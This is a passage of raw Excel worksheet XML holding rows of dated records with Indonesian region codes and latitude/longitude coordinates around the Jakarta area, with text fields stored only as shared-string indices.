      </c>
      <c r="Q3237" t="s">
        <v>552</v>
      </c>
      <c r="R3237" t="s">
        <v>281</v>
      </c>
      <c r="S3237" t="s">
        <v>49</v>
      </c>
      <c r="T3237" t="s">
        <v>33</v>
      </c>
      <c r="U3237" s="5">
        <v>10687942</v>
      </c>
      <c r="V3237" s="5" t="s">
        <v>17362</v>
      </c>
      <c r="W3237" s="5">
        <v>-625731</v>
      </c>
      <c r="X3237" t="s">
        <v>21102</v>
      </c>
      <c r="Y3237" t="str">
        <f t="shared" si="50"/>
        <v>-6.25731,106.87942</v>
      </c>
    </row>
    <row r="3238" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3238">
        <v>258843</v>
      </c>
      <c r="B3238" s="1">
        <v>44247</v>
      </c>
      <c r="C3238" s="2">
        <v>1.074074074074074E-2</v>
      </c>
      <c r="D3238" t="s">
        <v>22</v>
      </c>
      <c r="E3238" t="s">
        <v>23</v>
      </c>
      <c r="F3238" t="s">
        <v>10833</v>
      </c>
      <c r="G3238" t="s">
        <v>10834</v>
      </c>
      <c r="H3238" t="s">
        <v>26</v>
      </c>
      <c r="I3238" t="s">
        <v>1194</v>
      </c>
      <c r="J3238" t="s">
        <v>10835</v>
      </c>
      <c r="L3238" t="s">
        <v>250</v>
      </c>
      <c r="M3238">
        <v>3171010004</v>
      </c>
      <c r="N3238">
        <v>3171010</v>
      </c>
      <c r="O3238">
        <v>3171</v>
      </c>
      <c r="P3238">
        <v>31</v>
      </c>
      <c r="Q3238" t="s">
        <v>264</v>
      </c>
      <c r="R3238" t="s">
        <v>264</v>
      </c>
      <c r="S3238" t="s">
        <v>108</v>
      </c>
      <c r="T3238" t="s">
        <v>33</v>
      </c>
      <c r="U3238" s="5">
        <v>10682563</v>
      </c>
      <c r="V3238" s="5" t="s">
        <v>17363</v>
      </c>
      <c r="W3238" s="5">
        <v>-632505</v>
      </c>
      <c r="X3238" t="s">
        <v>21103</v>
      </c>
      <c r="Y3238" t="str">
        <f t="shared" si="50"/>
        <v>-6.32505,106.82563</v>
      </c>
    </row>
    <row r="3239" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3239">
        <v>258867</v>
      </c>
      <c r="B3239" s="1">
        <v>44247</v>
      </c>
      <c r="C3239" s="2">
        <v>1.1736111111111109E-2</v>
      </c>
      <c r="D3239" t="s">
        <v>22</v>
      </c>
      <c r="E3239" t="s">
        <v>23</v>
      </c>
      <c r="F3239" t="s">
        <v>10836</v>
      </c>
      <c r="G3239" t="s">
        <v>10837</v>
      </c>
      <c r="H3239" t="s">
        <v>26</v>
      </c>
      <c r="I3239" t="s">
        <v>10838</v>
      </c>
      <c r="J3239" t="s">
        <v>2485</v>
      </c>
      <c r="L3239" t="s">
        <v>10839</v>
      </c>
      <c r="M3239">
        <v>3171080001</v>
      </c>
      <c r="N3239">
        <v>3171080</v>
      </c>
      <c r="O3239">
        <v>3171</v>
      </c>
      <c r="P3239">
        <v>31</v>
      </c>
      <c r="Q3239" t="s">
        <v>2265</v>
      </c>
      <c r="R3239" t="s">
        <v>1403</v>
      </c>
      <c r="S3239" t="s">
        <v>108</v>
      </c>
      <c r="T3239" t="s">
        <v>33</v>
      </c>
      <c r="U3239" s="5">
        <v>10682880</v>
      </c>
      <c r="V3239" s="5" t="s">
        <v>17364</v>
      </c>
      <c r="W3239" s="5">
        <v>-627090</v>
      </c>
      <c r="X3239" t="s">
        <v>21104</v>
      </c>
      <c r="Y3239" t="str">
        <f t="shared" si="50"/>
        <v>-6.27090,106.82880</v>
      </c>
    </row>
    <row r="3240" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3240">
        <v>258869</v>
      </c>
      <c r="B3240" s="1">
        <v>44247</v>
      </c>
      <c r="C3240" s="2">
        <v>1.4571759259259258E-2</v>
      </c>
      <c r="D3240" t="s">
        <v>22</v>
      </c>
      <c r="E3240" t="s">
        <v>23</v>
      </c>
      <c r="F3240" t="s">
        <v>10840</v>
      </c>
      <c r="G3240" t="s">
        <v>10841</v>
      </c>
      <c r="H3240" t="s">
        <v>26</v>
      </c>
      <c r="I3240" t="s">
        <v>430</v>
      </c>
      <c r="J3240" t="s">
        <v>2627</v>
      </c>
      <c r="L3240" t="s">
        <v>10842</v>
      </c>
      <c r="M3240">
        <v>3275020001</v>
      </c>
      <c r="N3240">
        <v>3275020</v>
      </c>
      <c r="O3240">
        <v>3275</v>
      </c>
      <c r="P3240">
        <v>32</v>
      </c>
      <c r="Q3240" t="s">
        <v>5124</v>
      </c>
      <c r="R3240" t="s">
        <v>828</v>
      </c>
      <c r="S3240" t="s">
        <v>41</v>
      </c>
      <c r="T3240" t="s">
        <v>42</v>
      </c>
      <c r="U3240" s="5">
        <v>10695870</v>
      </c>
      <c r="V3240" s="5" t="s">
        <v>17365</v>
      </c>
      <c r="W3240" s="5">
        <v>-632326</v>
      </c>
      <c r="X3240" t="s">
        <v>21105</v>
      </c>
      <c r="Y3240" t="str">
        <f t="shared" si="50"/>
        <v>-6.32326,106.95870</v>
      </c>
    </row>
    <row r="3241" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3241">
        <v>258870</v>
      </c>
      <c r="B3241" s="1">
        <v>44247</v>
      </c>
      <c r="C3241" s="2">
        <v>1.4837962962962963E-2</v>
      </c>
      <c r="D3241" t="s">
        <v>22</v>
      </c>
      <c r="E3241" t="s">
        <v>23</v>
      </c>
      <c r="F3241" t="s">
        <v>10843</v>
      </c>
      <c r="H3241" t="s">
        <v>26</v>
      </c>
      <c r="I3241" t="s">
        <v>1240</v>
      </c>
      <c r="J3241" t="s">
        <v>1471</v>
      </c>
      <c r="L3241" t="s">
        <v>10844</v>
      </c>
      <c r="M3241">
        <v>3171100001</v>
      </c>
      <c r="N3241">
        <v>3171100</v>
      </c>
      <c r="O3241">
        <v>3171</v>
      </c>
      <c r="P3241">
        <v>31</v>
      </c>
      <c r="Q3241" t="s">
        <v>1474</v>
      </c>
      <c r="R3241" t="s">
        <v>107</v>
      </c>
      <c r="S3241" t="s">
        <v>108</v>
      </c>
      <c r="T3241" t="s">
        <v>33</v>
      </c>
      <c r="U3241" s="5">
        <v>10681767</v>
      </c>
      <c r="V3241" s="5" t="s">
        <v>17366</v>
      </c>
      <c r="W3241" s="5">
        <v>-621982</v>
      </c>
      <c r="X3241" t="s">
        <v>21106</v>
      </c>
      <c r="Y3241" t="str">
        <f t="shared" si="50"/>
        <v>-6.21982,106.81767</v>
      </c>
    </row>
    <row r="3242" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3242">
        <v>258894</v>
      </c>
      <c r="B3242" s="1">
        <v>44247</v>
      </c>
      <c r="C3242" s="2">
        <v>1.5983796296296295E-2</v>
      </c>
      <c r="D3242" t="s">
        <v>22</v>
      </c>
      <c r="E3242" t="s">
        <v>23</v>
      </c>
      <c r="F3242" t="s">
        <v>10845</v>
      </c>
      <c r="H3242" t="s">
        <v>26</v>
      </c>
      <c r="I3242" t="s">
        <v>10636</v>
      </c>
      <c r="J3242" t="s">
        <v>1471</v>
      </c>
      <c r="L3242" t="s">
        <v>1171</v>
      </c>
      <c r="M3242">
        <v>3171100001</v>
      </c>
      <c r="N3242">
        <v>3171100</v>
      </c>
      <c r="O3242">
        <v>3171</v>
      </c>
      <c r="P3242">
        <v>31</v>
      </c>
      <c r="Q3242" t="s">
        <v>1474</v>
      </c>
      <c r="R3242" t="s">
        <v>107</v>
      </c>
      <c r="S3242" t="s">
        <v>108</v>
      </c>
      <c r="T3242" t="s">
        <v>33</v>
      </c>
      <c r="U3242" s="5">
        <v>10681756</v>
      </c>
      <c r="V3242" s="5" t="s">
        <v>17367</v>
      </c>
      <c r="W3242" s="5">
        <v>-622304</v>
      </c>
      <c r="X3242" t="s">
        <v>21107</v>
      </c>
      <c r="Y3242" t="str">
        <f t="shared" si="50"/>
        <v>-6.22304,106.81756</v>
      </c>
    </row>
    <row r="3243" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3243">
        <v>258919</v>
      </c>
      <c r="B3243" s="1">
        <v>44247</v>
      </c>
      <c r="C3243" s="2">
        <v>1.8807870370370371E-2</v>
      </c>
      <c r="D3243" t="s">
        <v>22</v>
      </c>
      <c r="E3243" t="s">
        <v>23</v>
      </c>
      <c r="F3243" t="s">
        <v>10846</v>
      </c>
      <c r="G3243" t="s">
        <v>10847</v>
      </c>
      <c r="H3243" t="s">
        <v>26</v>
      </c>
      <c r="I3243" t="s">
        <v>945</v>
      </c>
      <c r="J3243" t="s">
        <v>2627</v>
      </c>
      <c r="L3243" t="s">
        <v>10848</v>
      </c>
      <c r="M3243">
        <v>3275060002</v>
      </c>
      <c r="N3243">
        <v>3275060</v>
      </c>
      <c r="O3243">
        <v>3275</v>
      </c>
      <c r="P3243">
        <v>32</v>
      </c>
      <c r="Q3243" t="s">
        <v>113</v>
      </c>
      <c r="R3243" t="s">
        <v>114</v>
      </c>
      <c r="S3243" t="s">
        <v>41</v>
      </c>
      <c r="T3243" t="s">
        <v>42</v>
      </c>
      <c r="U3243" s="5">
        <v>10696751</v>
      </c>
      <c r="V3243" s="5" t="s">
        <v>17368</v>
      </c>
      <c r="W3243" s="5">
        <v>-623281</v>
      </c>
      <c r="X3243" t="s">
        <v>21108</v>
      </c>
      <c r="Y3243" t="str">
        <f t="shared" si="50"/>
        <v>-6.23281,106.96751</v>
      </c>
    </row>
    <row r="3244" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3244">
        <v>258921</v>
      </c>
      <c r="B3244" s="1">
        <v>44247</v>
      </c>
      <c r="C3244" s="2">
        <v>1.9837962962962963E-2</v>
      </c>
      <c r="D3244" t="s">
        <v>22</v>
      </c>
      <c r="E3244" t="s">
        <v>23</v>
      </c>
      <c r="F3244" s="3" t="s">
        <v>10849</v>
      </c>
      <c r="G3244" t="s">
        <v>10850</v>
      </c>
      <c r="H3244" t="s">
        <v>26</v>
      </c>
      <c r="I3244" t="s">
        <v>386</v>
      </c>
      <c r="J3244" t="s">
        <v>3135</v>
      </c>
      <c r="L3244" t="s">
        <v>10851</v>
      </c>
      <c r="M3244">
        <v>3674060003</v>
      </c>
      <c r="N3244">
        <v>3674060</v>
      </c>
      <c r="O3244">
        <v>3674</v>
      </c>
      <c r="P3244">
        <v>36</v>
      </c>
      <c r="Q3244" t="s">
        <v>205</v>
      </c>
      <c r="R3244" t="s">
        <v>169</v>
      </c>
      <c r="S3244" t="s">
        <v>170</v>
      </c>
      <c r="T3244" t="s">
        <v>171</v>
      </c>
      <c r="U3244" s="5">
        <v>10669263</v>
      </c>
      <c r="V3244" s="5" t="s">
        <v>17369</v>
      </c>
      <c r="W3244" s="5">
        <v>-624403</v>
      </c>
      <c r="X3244" t="s">
        <v>19704</v>
      </c>
      <c r="Y3244" t="str">
        <f t="shared" si="50"/>
        <v>-6.24403,106.69263</v>
      </c>
    </row>
    <row r="3245" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3245">
        <v>258937</v>
      </c>
      <c r="B3245" s="1">
        <v>44247</v>
      </c>
      <c r="C3245" s="2">
        <v>2.0833333333333332E-2</v>
      </c>
      <c r="D3245" t="s">
        <v>2648</v>
      </c>
      <c r="E3245" t="s">
        <v>23</v>
      </c>
      <c r="G3245" t="s">
        <v>10852</v>
      </c>
      <c r="H3245" t="s">
        <v>26</v>
      </c>
      <c r="J3245" t="s">
        <v>6050</v>
      </c>
      <c r="L3245" t="s">
        <v>10853</v>
      </c>
      <c r="M3245">
        <v>3172020005</v>
      </c>
      <c r="N3245">
        <v>3172020</v>
      </c>
      <c r="O3245">
        <v>3172</v>
      </c>
      <c r="P3245">
        <v>31</v>
      </c>
      <c r="Q3245" t="s">
        <v>3744</v>
      </c>
      <c r="R3245" t="s">
        <v>1644</v>
      </c>
      <c r="S3245" t="s">
        <v>49</v>
      </c>
      <c r="T3245" t="s">
        <v>33</v>
      </c>
      <c r="U3245" s="5">
        <v>10688197</v>
      </c>
      <c r="V3245" s="5" t="s">
        <v>17370</v>
      </c>
      <c r="W3245" s="5">
        <v>-630993</v>
      </c>
      <c r="X3245" t="s">
        <v>21109</v>
      </c>
      <c r="Y3245" t="str">
        <f t="shared" si="50"/>
        <v>-6.30993,106.88197</v>
      </c>
    </row>
    <row r="3246" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3246">
        <v>258946</v>
      </c>
      <c r="B3246" s="1">
        <v>44247</v>
      </c>
      <c r="C3246" s="2">
        <v>2.4907407407407406E-2</v>
      </c>
      <c r="D3246" t="s">
        <v>22</v>
      </c>
      <c r="E3246" t="s">
        <v>23</v>
      </c>
      <c r="F3246" t="s">
        <v>10854</v>
      </c>
      <c r="G3246" t="s">
        <v>10855</v>
      </c>
      <c r="H3246" t="s">
        <v>26</v>
      </c>
      <c r="I3246" t="s">
        <v>137</v>
      </c>
      <c r="J3246" t="s">
        <v>5768</v>
      </c>
      <c r="L3246" t="s">
        <v>10856</v>
      </c>
      <c r="M3246">
        <v>3172050003</v>
      </c>
      <c r="N3246">
        <v>3172050</v>
      </c>
      <c r="O3246">
        <v>3172</v>
      </c>
      <c r="P3246">
        <v>31</v>
      </c>
      <c r="Q3246" t="s">
        <v>2896</v>
      </c>
      <c r="R3246" t="s">
        <v>358</v>
      </c>
      <c r="S3246" t="s">
        <v>49</v>
      </c>
      <c r="T3246" t="s">
        <v>33</v>
      </c>
      <c r="U3246" s="5">
        <v>10686657</v>
      </c>
      <c r="V3246" s="5" t="s">
        <v>17371</v>
      </c>
      <c r="W3246" s="5">
        <v>-628911</v>
      </c>
      <c r="X3246" t="s">
        <v>20067</v>
      </c>
      <c r="Y3246" t="str">
        <f t="shared" si="50"/>
        <v>-6.28911,106.86657</v>
      </c>
    </row>
    <row r="3247" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3247">
        <v>258947</v>
      </c>
      <c r="B3247" s="1">
        <v>44247</v>
      </c>
      <c r="C3247" s="2">
        <v>2.4918981481481483E-2</v>
      </c>
      <c r="D3247" t="s">
        <v>22</v>
      </c>
      <c r="E3247" t="s">
        <v>23</v>
      </c>
      <c r="F3247" t="s">
        <v>10857</v>
      </c>
      <c r="G3247" t="s">
        <v>10858</v>
      </c>
      <c r="H3247" t="s">
        <v>26</v>
      </c>
      <c r="I3247" t="s">
        <v>1809</v>
      </c>
      <c r="J3247" t="s">
        <v>3135</v>
      </c>
      <c r="M3247">
        <v>3671040011</v>
      </c>
      <c r="N3247">
        <v>3671040</v>
      </c>
      <c r="O3247">
        <v>3671</v>
      </c>
      <c r="P3247">
        <v>36</v>
      </c>
      <c r="Q3247" t="s">
        <v>10859</v>
      </c>
      <c r="R3247" t="s">
        <v>10860</v>
      </c>
      <c r="S3247" t="s">
        <v>201</v>
      </c>
      <c r="T3247" t="s">
        <v>171</v>
      </c>
      <c r="U3247" s="5">
        <v>10657988</v>
      </c>
      <c r="V3247" s="5" t="s">
        <v>17372</v>
      </c>
      <c r="W3247" s="5">
        <v>-618147</v>
      </c>
      <c r="X3247" t="s">
        <v>21110</v>
      </c>
      <c r="Y3247" t="str">
        <f t="shared" si="50"/>
        <v>-6.18147,106.57988</v>
      </c>
    </row>
    <row r="3248" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3248">
        <v>258972</v>
      </c>
      <c r="B3248" s="1">
        <v>44247</v>
      </c>
      <c r="C3248" s="2">
        <v>2.6493055555555558E-2</v>
      </c>
      <c r="D3248" t="s">
        <v>22</v>
      </c>
      <c r="E3248" t="s">
        <v>23</v>
      </c>
      <c r="F3248" t="s">
        <v>10861</v>
      </c>
      <c r="H3248" t="s">
        <v>26</v>
      </c>
      <c r="I3248" t="s">
        <v>137</v>
      </c>
      <c r="J3248" t="s">
        <v>3135</v>
      </c>
      <c r="L3248" t="s">
        <v>10862</v>
      </c>
      <c r="M3248">
        <v>3671010001</v>
      </c>
      <c r="N3248">
        <v>3671010</v>
      </c>
      <c r="O3248">
        <v>3671</v>
      </c>
      <c r="P3248">
        <v>36</v>
      </c>
      <c r="Q3248" t="s">
        <v>4656</v>
      </c>
      <c r="R3248" t="s">
        <v>200</v>
      </c>
      <c r="S3248" t="s">
        <v>201</v>
      </c>
      <c r="T3248" t="s">
        <v>171</v>
      </c>
      <c r="U3248" s="5">
        <v>10668928</v>
      </c>
      <c r="V3248" s="5" t="s">
        <v>17373</v>
      </c>
      <c r="W3248" s="5">
        <v>-623768</v>
      </c>
      <c r="X3248" t="s">
        <v>21111</v>
      </c>
      <c r="Y3248" t="str">
        <f t="shared" si="50"/>
        <v>-6.23768,106.68928</v>
      </c>
    </row>
    <row r="3249" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3249">
        <v>258997</v>
      </c>
      <c r="B3249" s="1">
        <v>44247</v>
      </c>
      <c r="C3249" s="2">
        <v>3.1273148148148147E-2</v>
      </c>
      <c r="D3249" t="s">
        <v>22</v>
      </c>
      <c r="E3249" t="s">
        <v>23</v>
      </c>
      <c r="F3249" t="s">
        <v>10863</v>
      </c>
      <c r="G3249" t="s">
        <v>10864</v>
      </c>
      <c r="H3249" t="s">
        <v>26</v>
      </c>
      <c r="I3249" t="s">
        <v>10865</v>
      </c>
      <c r="J3249" t="s">
        <v>7854</v>
      </c>
      <c r="L3249" t="s">
        <v>10866</v>
      </c>
      <c r="M3249">
        <v>3171050005</v>
      </c>
      <c r="N3249">
        <v>3171050</v>
      </c>
      <c r="O3249">
        <v>3171</v>
      </c>
      <c r="P3249">
        <v>31</v>
      </c>
      <c r="Q3249" t="s">
        <v>8057</v>
      </c>
      <c r="R3249" t="s">
        <v>508</v>
      </c>
      <c r="S3249" t="s">
        <v>108</v>
      </c>
      <c r="T3249" t="s">
        <v>33</v>
      </c>
      <c r="U3249" s="5">
        <v>10676661</v>
      </c>
      <c r="V3249" s="5" t="s">
        <v>17374</v>
      </c>
      <c r="W3249" s="5">
        <v>-622653</v>
      </c>
      <c r="X3249" t="s">
        <v>21112</v>
      </c>
      <c r="Y3249" t="str">
        <f t="shared" si="50"/>
        <v>-6.22653,106.76661</v>
      </c>
    </row>
    <row r="3250" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3250">
        <v>259022</v>
      </c>
      <c r="B3250" s="1">
        <v>44247</v>
      </c>
      <c r="C3250" s="2">
        <v>3.3043981481481487E-2</v>
      </c>
      <c r="D3250" t="s">
        <v>22</v>
      </c>
      <c r="E3250" t="s">
        <v>23</v>
      </c>
      <c r="F3250" t="s">
        <v>10867</v>
      </c>
      <c r="G3250" t="s">
        <v>10868</v>
      </c>
      <c r="H3250" t="s">
        <v>26</v>
      </c>
      <c r="I3250" t="s">
        <v>904</v>
      </c>
      <c r="J3250" t="s">
        <v>2608</v>
      </c>
      <c r="L3250" t="s">
        <v>10869</v>
      </c>
      <c r="M3250">
        <v>3375010009</v>
      </c>
      <c r="N3250">
        <v>3375010</v>
      </c>
      <c r="O3250">
        <v>3375</v>
      </c>
      <c r="P3250">
        <v>33</v>
      </c>
      <c r="Q3250" t="s">
        <v>10870</v>
      </c>
      <c r="R3250" t="s">
        <v>6337</v>
      </c>
      <c r="S3250" t="s">
        <v>6246</v>
      </c>
      <c r="T3250" t="s">
        <v>1134</v>
      </c>
      <c r="U3250" s="5">
        <v>10966604</v>
      </c>
      <c r="V3250" s="5" t="s">
        <v>17375</v>
      </c>
      <c r="W3250" s="5">
        <v>-688800</v>
      </c>
      <c r="X3250" t="s">
        <v>21113</v>
      </c>
      <c r="Y3250" t="str">
        <f t="shared" si="50"/>
        <v>-6.88800,109.66604</v>
      </c>
    </row>
    <row r="3251" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3251">
        <v>259023</v>
      </c>
      <c r="B3251" s="1">
        <v>44247</v>
      </c>
      <c r="C3251" s="2">
        <v>3.3611111111111112E-2</v>
      </c>
      <c r="D3251" t="s">
        <v>22</v>
      </c>
      <c r="E3251" t="s">
        <v>23</v>
      </c>
      <c r="F3251" t="s">
        <v>10871</v>
      </c>
      <c r="G3251" t="s">
        <v>10872</v>
      </c>
      <c r="H3251" t="s">
        <v>26</v>
      </c>
      <c r="I3251" t="s">
        <v>44</v>
      </c>
      <c r="J3251" t="s">
        <v>10616</v>
      </c>
      <c r="L3251" t="s">
        <v>10873</v>
      </c>
      <c r="M3251">
        <v>3171020002</v>
      </c>
      <c r="N3251">
        <v>3171020</v>
      </c>
      <c r="O3251">
        <v>3171</v>
      </c>
      <c r="P3251">
        <v>31</v>
      </c>
      <c r="Q3251" t="s">
        <v>1172</v>
      </c>
      <c r="R3251" t="s">
        <v>484</v>
      </c>
      <c r="S3251" t="s">
        <v>108</v>
      </c>
      <c r="T3251" t="s">
        <v>33</v>
      </c>
      <c r="U3251" s="5">
        <v>10682248</v>
      </c>
      <c r="V3251" s="5" t="s">
        <v>17376</v>
      </c>
      <c r="W3251" s="5">
        <v>-628865</v>
      </c>
      <c r="X3251" t="s">
        <v>21114</v>
      </c>
      <c r="Y3251" t="str">
        <f t="shared" si="50"/>
        <v>-6.28865,106.82248</v>
      </c>
    </row>
    <row r="3252" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3252">
        <v>259024</v>
      </c>
      <c r="B3252" s="1">
        <v>44247</v>
      </c>
      <c r="C3252" s="2">
        <v>3.498842592592593E-2</v>
      </c>
      <c r="D3252" t="s">
        <v>22</v>
      </c>
      <c r="E3252" t="s">
        <v>23</v>
      </c>
      <c r="F3252" t="s">
        <v>10874</v>
      </c>
      <c r="G3252" t="s">
        <v>10875</v>
      </c>
      <c r="H3252" t="s">
        <v>26</v>
      </c>
      <c r="I3252" t="s">
        <v>380</v>
      </c>
      <c r="J3252" t="s">
        <v>2627</v>
      </c>
      <c r="L3252" t="s">
        <v>10876</v>
      </c>
      <c r="M3252">
        <v>3216061004</v>
      </c>
      <c r="N3252">
        <v>3216061</v>
      </c>
      <c r="O3252">
        <v>3216</v>
      </c>
      <c r="P3252">
        <v>32</v>
      </c>
      <c r="Q3252" t="s">
        <v>54</v>
      </c>
      <c r="R3252" t="s">
        <v>55</v>
      </c>
      <c r="S3252" t="s">
        <v>41</v>
      </c>
      <c r="T3252" t="s">
        <v>42</v>
      </c>
      <c r="U3252" s="5">
        <v>10716355</v>
      </c>
      <c r="V3252" s="5" t="s">
        <v>17377</v>
      </c>
      <c r="W3252" s="5">
        <v>-630007</v>
      </c>
      <c r="X3252" t="s">
        <v>21115</v>
      </c>
      <c r="Y3252" t="str">
        <f t="shared" si="50"/>
        <v>-6.30007,107.16355</v>
      </c>
    </row>
    <row r="3253" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3253">
        <v>259049</v>
      </c>
      <c r="B3253" s="1">
        <v>44247</v>
      </c>
      <c r="C3253" s="2">
        <v>3.6979166666666667E-2</v>
      </c>
      <c r="D3253" t="s">
        <v>22</v>
      </c>
      <c r="E3253" t="s">
        <v>23</v>
      </c>
      <c r="F3253" t="s">
        <v>10877</v>
      </c>
      <c r="G3253" t="s">
        <v>10878</v>
      </c>
      <c r="H3253" t="s">
        <v>26</v>
      </c>
      <c r="I3253" t="s">
        <v>3704</v>
      </c>
      <c r="J3253" t="s">
        <v>3135</v>
      </c>
      <c r="M3253">
        <v>3674060003</v>
      </c>
      <c r="N3253">
        <v>3674060</v>
      </c>
      <c r="O3253">
        <v>3674</v>
      </c>
      <c r="P3253">
        <v>36</v>
      </c>
      <c r="Q3253" t="s">
        <v>205</v>
      </c>
      <c r="R3253" t="s">
        <v>169</v>
      </c>
      <c r="S3253" t="s">
        <v>170</v>
      </c>
      <c r="T3253" t="s">
        <v>171</v>
      </c>
      <c r="U3253" s="5">
        <v>10669195</v>
      </c>
      <c r="V3253" s="5" t="s">
        <v>17378</v>
      </c>
      <c r="W3253" s="5">
        <v>-624835</v>
      </c>
      <c r="X3253" t="s">
        <v>21116</v>
      </c>
      <c r="Y3253" t="str">
        <f t="shared" si="50"/>
        <v>-6.24835,106.69195</v>
      </c>
    </row>
    <row r="3254" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3254">
        <v>259098</v>
      </c>
      <c r="B3254" s="1">
        <v>44247</v>
      </c>
      <c r="C3254" s="2">
        <v>4.2951388888888886E-2</v>
      </c>
      <c r="D3254" t="s">
        <v>22</v>
      </c>
      <c r="E3254" t="s">
        <v>23</v>
      </c>
      <c r="F3254" t="s">
        <v>10879</v>
      </c>
      <c r="G3254" t="s">
        <v>10880</v>
      </c>
      <c r="H3254" t="s">
        <v>26</v>
      </c>
      <c r="I3254" t="s">
        <v>862</v>
      </c>
      <c r="J3254" t="s">
        <v>3686</v>
      </c>
      <c r="L3254" t="s">
        <v>10881</v>
      </c>
      <c r="M3254">
        <v>3172040002</v>
      </c>
      <c r="N3254">
        <v>3172040</v>
      </c>
      <c r="O3254">
        <v>3172</v>
      </c>
      <c r="P3254">
        <v>31</v>
      </c>
      <c r="Q3254" t="s">
        <v>281</v>
      </c>
      <c r="R3254" t="s">
        <v>281</v>
      </c>
      <c r="S3254" t="s">
        <v>49</v>
      </c>
      <c r="T3254" t="s">
        <v>33</v>
      </c>
      <c r="U3254" s="5">
        <v>10688066</v>
      </c>
      <c r="V3254" s="5" t="s">
        <v>17379</v>
      </c>
      <c r="W3254" s="5">
        <v>-628229</v>
      </c>
      <c r="X3254" t="s">
        <v>21117</v>
      </c>
      <c r="Y3254" t="str">
        <f t="shared" si="50"/>
        <v>-6.28229,106.88066</v>
      </c>
    </row>
    <row r="3255" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3255">
        <v>259123</v>
      </c>
      <c r="B3255" s="1">
        <v>44247</v>
      </c>
      <c r="C3255" s="2">
        <v>4.7719907407407412E-2</v>
      </c>
      <c r="D3255" t="s">
        <v>22</v>
      </c>
      <c r="E3255" t="s">
        <v>23</v>
      </c>
      <c r="F3255" t="s">
        <v>10882</v>
      </c>
      <c r="G3255" t="s">
        <v>10883</v>
      </c>
      <c r="H3255" t="s">
        <v>26</v>
      </c>
      <c r="I3255" t="s">
        <v>10884</v>
      </c>
      <c r="J3255" t="s">
        <v>2627</v>
      </c>
      <c r="L3255" t="s">
        <v>10885</v>
      </c>
      <c r="M3255">
        <v>3275060008</v>
      </c>
      <c r="N3255">
        <v>3275060</v>
      </c>
      <c r="O3255">
        <v>3275</v>
      </c>
      <c r="P3255">
        <v>32</v>
      </c>
      <c r="Q3255" t="s">
        <v>2473</v>
      </c>
      <c r="R3255" t="s">
        <v>114</v>
      </c>
      <c r="S3255" t="s">
        <v>41</v>
      </c>
      <c r="T3255" t="s">
        <v>42</v>
      </c>
      <c r="U3255" s="5">
        <v>10695799</v>
      </c>
      <c r="V3255" s="5" t="s">
        <v>17380</v>
      </c>
      <c r="W3255" s="5">
        <v>-625166</v>
      </c>
      <c r="X3255" t="s">
        <v>19029</v>
      </c>
      <c r="Y3255" t="str">
        <f t="shared" si="50"/>
        <v>-6.25166,106.95799</v>
      </c>
    </row>
    <row r="3256" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3256">
        <v>259124</v>
      </c>
      <c r="B3256" s="1">
        <v>44247</v>
      </c>
      <c r="C3256" s="2">
        <v>4.8657407407407406E-2</v>
      </c>
      <c r="D3256" t="s">
        <v>22</v>
      </c>
      <c r="E3256" t="s">
        <v>23</v>
      </c>
      <c r="F3256" t="s">
        <v>10886</v>
      </c>
      <c r="G3256" t="s">
        <v>10887</v>
      </c>
      <c r="H3256" t="s">
        <v>26</v>
      </c>
      <c r="I3256" t="s">
        <v>4678</v>
      </c>
      <c r="J3256" t="s">
        <v>2627</v>
      </c>
      <c r="L3256" t="s">
        <v>10888</v>
      </c>
      <c r="M3256">
        <v>3216061004</v>
      </c>
      <c r="N3256">
        <v>3216061</v>
      </c>
      <c r="O3256">
        <v>3216</v>
      </c>
      <c r="P3256">
        <v>32</v>
      </c>
      <c r="Q3256" t="s">
        <v>54</v>
      </c>
      <c r="R3256" t="s">
        <v>55</v>
      </c>
      <c r="S3256" t="s">
        <v>41</v>
      </c>
      <c r="T3256" t="s">
        <v>42</v>
      </c>
      <c r="U3256" s="5">
        <v>10716413</v>
      </c>
      <c r="V3256" s="5" t="s">
        <v>17381</v>
      </c>
      <c r="W3256" s="5">
        <v>-629863</v>
      </c>
      <c r="X3256" t="s">
        <v>21118</v>
      </c>
      <c r="Y3256" t="str">
        <f t="shared" si="50"/>
        <v>-6.29863,107.16413</v>
      </c>
    </row>
    <row r="3257" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3257">
        <v>259143</v>
      </c>
      <c r="B3257" s="1">
        <v>44247</v>
      </c>
      <c r="C3257" s="2">
        <v>5.1655092592592593E-2</v>
      </c>
      <c r="D3257" t="s">
        <v>22</v>
      </c>
      <c r="E3257" t="s">
        <v>23</v>
      </c>
      <c r="F3257" t="s">
        <v>10889</v>
      </c>
      <c r="H3257" t="s">
        <v>26</v>
      </c>
      <c r="I3257" t="s">
        <v>1389</v>
      </c>
      <c r="J3257" t="s">
        <v>2627</v>
      </c>
      <c r="L3257" t="s">
        <v>10890</v>
      </c>
      <c r="M3257">
        <v>3275010011</v>
      </c>
      <c r="N3257">
        <v>3275010</v>
      </c>
      <c r="O3257">
        <v>3275</v>
      </c>
      <c r="P3257">
        <v>32</v>
      </c>
      <c r="Q3257" t="s">
        <v>2389</v>
      </c>
      <c r="R3257" t="s">
        <v>287</v>
      </c>
      <c r="S3257" t="s">
        <v>41</v>
      </c>
      <c r="T3257" t="s">
        <v>42</v>
      </c>
      <c r="U3257" s="5">
        <v>10692193</v>
      </c>
      <c r="V3257" s="5" t="s">
        <v>17382</v>
      </c>
      <c r="W3257" s="5">
        <v>-626718</v>
      </c>
      <c r="X3257" t="s">
        <v>21119</v>
      </c>
      <c r="Y3257" t="str">
        <f t="shared" si="50"/>
